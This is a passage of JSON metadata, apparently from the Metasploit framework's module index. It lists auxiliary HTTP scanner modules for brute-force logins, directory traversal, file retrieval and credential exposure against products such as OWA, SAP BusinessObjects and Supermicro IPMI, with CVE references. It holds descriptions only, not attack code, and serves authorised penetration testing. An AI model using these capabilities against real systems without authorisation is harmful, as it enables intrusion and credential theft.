"auxiliary_scanner/http/oracle_demantra_file_retrieval": {
"name": "Oracle Demantra Arbitrary File Retrieval with Authentication Bypass",
"full_name": "auxiliary/scanner/http/oracle_demantra_file_retrieval",
"rank": 300,
"disclosure_date": "2014-02-28",
"type": "auxiliary",
"author": [
"Oliver Gruskovnjak"
],
"description": "This module exploits a file download vulnerability found in Oracle\n Demantra 12.2.1 in combination with an authentication bypass. By\n combining these exposures, an unauthenticated user can retrieve any file\n on the system by referencing the full file path to any file a vulnerable\n machine.",
"references": [
"CVE-2013-5877",
"CVE-2013-5880",
"URL-https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5877/",
"URL-https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb",
"is_install_path": true,
"ref_name": "scanner/http/oracle_demantra_file_retrieval",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/oracle_ilom_login": {
"name": "Oracle ILO Manager Login Brute Force Utility",
"full_name": "auxiliary/scanner/http/oracle_ilom_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for Oracle Integrated Lights Out Manager (ILO) login portal, and\n performs a login brute force attack to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/oracle_ilom_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/oracle_ilom_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/owa_ews_login": {
"name": "OWA Exchange Web Services (EWS) Login Scanner",
"full_name": "auxiliary/scanner/http/owa_ews_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rich Whitcroft"
],
"description": "This module attempts to log in to the Exchange Web Services, often\n exposed at https://example.com/ews/, using NTLM authentication. This\n method is faster and simpler than traditional form-based logins.\n\n In most cases, all you need to set is RHOSTS and some combination of\n user/pass files; the autodiscovery should find the location of the NTLM\n authentication point as well as the AD domain, and use them accordingly.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/owa_ews_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/owa_ews_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/owa_iis_internal_ip": {
"name": "Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure",
"full_name": "auxiliary/scanner/http/owa_iis_internal_ip",
"rank": 300,
"disclosure_date": "2012-12-17",
"type": "auxiliary",
"author": [
"Nate Power"
],
"description": "This module tests vulnerable IIS HTTP header file paths on Microsoft\n Exchange OWA 2003 and CAS 2007, 2010, and 2013 servers.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb",
"is_install_path": true,
"ref_name": "scanner/http/owa_iis_internal_ip",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/owa_login": {
"name": "Outlook Web App (OWA) Brute Force Utility",
"full_name": "auxiliary/scanner/http/owa_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vitor Moreira",
"Spencer McIntyre",
"SecureState R&D Team",
"sinn3r <sinn3r@metasploit.com>",
"Brandon Knight",
"Pete (Bokojan) Arzamendi",
"Nate Power",
"Chapman (R3naissance) Schleiss",
"Andrew Smith"
],
"description": "This module tests credentials on OWA 2003, 2007, 2010, 2013, and 2016 servers.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-02-23 13:16:41 +0000",
"path": "/modules/auxiliary/scanner/http/owa_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/owa_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/phpmyadmin_login": {
"name": "PhpMyAdmin Login Scanner",
"full_name": "auxiliary/scanner/http/phpmyadmin_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Shelby Pace"
],
"description": "This module will attempt to authenticate to PhpMyAdmin.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-24 23:21:59 +0000",
"path": "/modules/auxiliary/scanner/http/phpmyadmin_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/phpmyadmin_login",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/pocketpad_login": {
"name": "PocketPAD Login Bruteforce Force Utility",
"full_name": "auxiliary/scanner/http/pocketpad_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for PocketPAD login portal, and\n performs a login bruteforce attack to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/pocketpad_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/pocketpad_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/prev_dir_same_name_file": {
"name": "HTTP Previous Directory File Scanner",
"full_name": "auxiliary/scanner/http/prev_dir_same_name_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies files in the first parent directory with same name as\n the given directory path. Example: Test /backup/files/ will look for the\n following files /backup/files.ext .",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb",
"is_install_path": true,
"ref_name": "scanner/http/prev_dir_same_name_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/radware_appdirector_enum": {
"name": "Radware AppDirector Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/radware_appdirector_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for Radware AppDirector's web login portal, and performs login brute force\n to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/radware_appdirector_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/radware_appdirector_enum",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/rails_json_yaml_scanner": {
"name": "Ruby on Rails JSON Processor YAML Deserialization Scanner",
"full_name": "auxiliary/scanner/http/rails_json_yaml_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jjarmoc",
"hdm <x@hdm.io>"
],
"description": "This module attempts to identify Ruby on Rails instances vulnerable to\n an arbitrary object instantiation flaw in the JSON request processor.",
"references": [
"CVE-2013-0333"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/rails_json_yaml_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/rails_mass_assignment": {
"name": "Ruby On Rails Attributes Mass Assignment Scanner",
"full_name": "auxiliary/scanner/http/rails_mass_assignment",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Gregory Man <man.gregory@gmail.com>"
],
"description": "This module scans Ruby On Rails sites for\n models with attributes not protected by attr_protected or attr_accessible.\n After attempting to assign a non-existent field, the default rails with\n active_record setup will raise an ActiveRecord::UnknownAttributeError\n exception, and reply with HTTP code 500.",
"references": [
"URL-http://guides.rubyonrails.org/security.html#mass-assignment"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/rails_mass_assignment.rb",
"is_install_path": true,
"ref_name": "scanner/http/rails_mass_assignment",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/rails_xml_yaml_scanner": {
"name": "Ruby on Rails XML Processor YAML Deserialization Scanner",
"full_name": "auxiliary/scanner/http/rails_xml_yaml_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"jjarmoc"
],
"description": "This module attempts to identify Ruby on Rails instances vulnerable to\n an arbitrary object instantiation flaw in the XML request processor.",
"references": [
"CVE-2013-0156",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/rails_xml_yaml_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/replace_ext": {
"name": "HTTP File Extension Scanner",
"full_name": "auxiliary/scanner/http/replace_ext",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of additional files\n by modifying the extension of an existing file.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/replace_ext.rb",
"is_install_path": true,
"ref_name": "scanner/http/replace_ext",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/rewrite_proxy_bypass": {
"name": "Apache Reverse Proxy Bypass Vulnerability Scanner",
"full_name": "auxiliary/scanner/http/rewrite_proxy_bypass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"chao-mu"
],
"description": "Scan for poorly configured reverse proxy servers.\n By default, this module attempts to force the server to make\n a request with an invalid domain name. Then, if the bypass\n is successful, the server will look it up and of course fail,\n then responding with a status code 502. A baseline status code\n is always established and if that baseline matches your test\n status code, the injection attempt does not occur.\n \"set VERBOSE true\" if you are paranoid and want to catch potential\n false negatives. Works best against Apache and mod_rewrite",
"references": [
"URL-http://www.contextis.com/research/blog/reverseproxybypass/",
"CVE-2011-3368"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/http/rewrite_proxy_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/rfcode_reader_enum": {
"name": "RFCode Reader Web Interface Login / Bruteforce Utility",
"full_name": "auxiliary/scanner/http/rfcode_reader_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module simply attempts to login to a RFCode Reader web interface.\n Please note that by default there is no authentication. In such a case, password brute force will not be performed.\n If there is authentication configured, the module will attempt to find valid login credentials and capture device information.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/rfcode_reader_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/rfcode_reader_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/rips_traversal": {
"name": "RIPS Scanner Directory Traversal",
"full_name": "auxiliary/scanner/http/rips_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"localh0t",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in the RIPS Scanner v0.54,\n allowing to read arbitrary files with the web server privileges.",
"references": [
"EDB-18660",
"URL-http://codesec.blogspot.com.br/2015/03/rips-scanner-v-054-local-file-include.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/rips_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/rips_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/riverbed_steelhead_vcx_file_read": {
"name": "Riverbed SteelHead VCX File Read",
"full_name": "auxiliary/scanner/http/riverbed_steelhead_vcx_file_read",
"rank": 300,
"disclosure_date": "2017-06-01",
"type": "auxiliary",
"author": [
"Gregory DRAPERI <gregory.draper_at_gmail.com>",
"h00die"
],
"description": "This module exploits an authenticated arbitrary file read in the log module's filter engine.\n SteelHead VCX (VCX255U) version 9.6.0a was confirmed as vulnerable.",
"references": [
"EDB-42101"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/riverbed_steelhead_vcx_file_read",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/robots_txt": {
"name": "HTTP Robots.txt Content Scanner",
"full_name": "auxiliary/scanner/http/robots_txt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Detect robots.txt files and analize its content",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/robots_txt.rb",
"is_install_path": true,
"ref_name": "scanner/http/robots_txt",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/s40_traversal": {
"name": "S40 0.4.2 CMS Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/http/s40_traversal",
"rank": 300,
"disclosure_date": "2011-04-07",
"type": "auxiliary",
"author": [
"Osirys <osirys@autistici.org>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability found in S40 CMS.\n The flaw is due to the 'page' function not properly handling the $pid parameter,\n which allows a malicious user to load an arbitrary file path.",
"references": [
"OSVDB-82469",
"EDB-17129"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/s40_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/s40_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sap_businessobjects_user_brute": {
"name": "SAP BusinessObjects User Bruteforcer",
"full_name": "auxiliary/scanner/http/sap_businessobjects_user_brute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module attempts to bruteforce SAP BusinessObjects users.\n The dswsbobje interface is only used to verify valid credentials for CmcApp.\n Therefore, any valid credentials that have been identified can be leveraged by\n logging into CmcApp.",
"references": [
"URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb",
"is_install_path": true,
"ref_name": "scanner/http/sap_businessobjects_user_brute",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sap_businessobjects_user_brute_web": {
"name": "SAP BusinessObjects Web User Bruteforcer",
"full_name": "auxiliary/scanner/http/sap_businessobjects_user_brute_web",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.",
"references": [
"URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf"
],
"platform": "",
"arch": "",
"rport": 6405,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
6405
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb",
"is_install_path": true,
"ref_name": "scanner/http/sap_businessobjects_user_brute_web",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sap_businessobjects_user_enum": {
"name": "SAP BusinessObjects User Enumeration",
"full_name": "auxiliary/scanner/http/sap_businessobjects_user_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module simply attempts to enumerate SAP BusinessObjects\n users. The dswsbobje interface is only used to verify valid\n users for CmcApp. Therefore, any valid users that have been\n identified can be leveraged by logging into CmcApp.",
"references": [
"URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/sap_businessobjects_user_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sap_businessobjects_version_enum": {
"name": "SAP BusinessObjects Version Detection",
"full_name": "auxiliary/scanner/http/sap_businessobjects_version_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module simply attempts to identify the version of SAP BusinessObjects.",
"references": [
"URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/sap_businessobjects_version_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/scraper": {
"name": "HTTP Page Scraper",
"full_name": "auxiliary/scanner/http/scraper",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Scrape defined data from a specific web page based on a regular expression",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/scraper.rb",
"is_install_path": true,
"ref_name": "scanner/http/scraper",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sentry_cdu_enum": {
"name": "Sentry Switched CDU Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/sentry_cdu_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for ServerTech's Sentry Switched CDU (Cabinet Power\n Distribution Unit) web login portals, and performs login brute force\n to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/sentry_cdu_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/sentry_cdu_enum",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/servicedesk_plus_traversal": {
"name": "ManageEngine ServiceDesk Plus Path Traversal",
"full_name": "auxiliary/scanner/http/servicedesk_plus_traversal",
"rank": 300,
"disclosure_date": "2015-10-03",
"type": "auxiliary",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits an unauthenticated path traversal vulnerability found in ManageEngine\n ServiceDesk Plus build 9110 and lower. The module will retrieve any file on the filesystem\n with the same privileges as Support Center Plus is running. On Windows, files can be retrieved\n with SYSTEM privileges. The issue has been resolved in ServiceDesk Plus build 91111 (issue SD-60283).",
"references": [
"URL-https://www.manageengine.com/products/service-desk/readme-9.1.html"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/servicedesk_plus_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sevone_enum": {
"name": "SevOne Network Performance Management Application Brute Force Login Utility",
"full_name": "auxiliary/scanner/http/sevone_enum",
"rank": 300,
"disclosure_date": "2013-06-07",
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for SevOne Network Performance Management System Application,\n finds its version, and performs login brute force to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/sevone_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/sevone_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/simple_webserver_traversal": {
"name": "Simple Web Server 2.3-RC1 Directory Traversal",
"full_name": "auxiliary/scanner/http/simple_webserver_traversal",
"rank": 300,
"disclosure_date": "2013-01-03",
"type": "auxiliary",
"author": [
"CwG GeNiuS",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability found in\n Simple Web Server 2.3-RC1.",
"references": [
"CVE-2002-1864",
"OSVDB-88877",
"EDB-23886",
"URL-https://seclists.org/bugtraq/2013/Jan/12"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/simple_webserver_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/simple_webserver_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/smt_ipmi_49152_exposure": {
"name": "Supermicro Onboard IPMI Port 49152 Sensitive File Exposure",
"full_name": "auxiliary/scanner/http/smt_ipmi_49152_exposure",
"rank": 300,
"disclosure_date": "2014-06-19",
"type": "auxiliary",
"author": [
"Zach Wikholm <kestrel@trylinux.us>",
"John Matherly <jmath@shodan.io>",
"Dan Farmer <zen@fish2.com>",
"hdm <x@hdm.io>"
],
"description": "This module abuses a file exposure vulnerability accessible through the web interface\n on port 49152 of Supermicro Onboard IPMI controllers. The vulnerability allows an attacker\n to obtain detailed device information and download data files containing the clear-text\n usernames and passwords for the controller. In May of 2014, at least 30,000 unique IPs\n were exposed to the internet with this vulnerability.",
"references": [
"URL-http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/",
"URL-https://github.com/zenfish/ipmi/blob/master/dump_SM.py"
],
"platform": "",
"arch": "",
"rport": 49152,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb",
"is_install_path": true,
"ref_name": "scanner/http/smt_ipmi_49152_exposure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/smt_ipmi_cgi_scanner": {
"name": "Supermicro Onboard IPMI CGI Vulnerability Scanner",
"full_name": "auxiliary/scanner/http/smt_ipmi_cgi_scanner",
"rank": 300,
"disclosure_date": "2013-11-06",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module checks for known vulnerabilities in the CGI applications of\n Supermicro Onboard IPMI controllers. These issues currently include\n several unauthenticated buffer overflows in the login.cgi and close_window.cgi\n components.",
"references": [
"CVE-2013-3621",
"CVE-2013-3623",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/smt_ipmi_cgi_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/smt_ipmi_static_cert_scanner": {
"name": "Supermicro Onboard IPMI Static SSL Certificate Scanner",
"full_name": "auxiliary/scanner/http/smt_ipmi_static_cert_scanner",
"rank": 300,
"disclosure_date": "2013-11-06",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"juan"
],
"description": "This module checks for a static SSL certificate shipped with Supermicro Onboard IPMI\n controllers. An attacker with access to the publicly-available firmware can perform\n man-in-the-middle attacks and offline decryption of communication to the controller.\n This module has been on a Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware\n version SMT_X9_214.",
"references": [
"CVE-2013-3619",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/smt_ipmi_static_cert_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/smt_ipmi_url_redirect_traversal": {
"name": "Supermicro Onboard IPMI url_redirect.cgi Authenticated Directory Traversal",
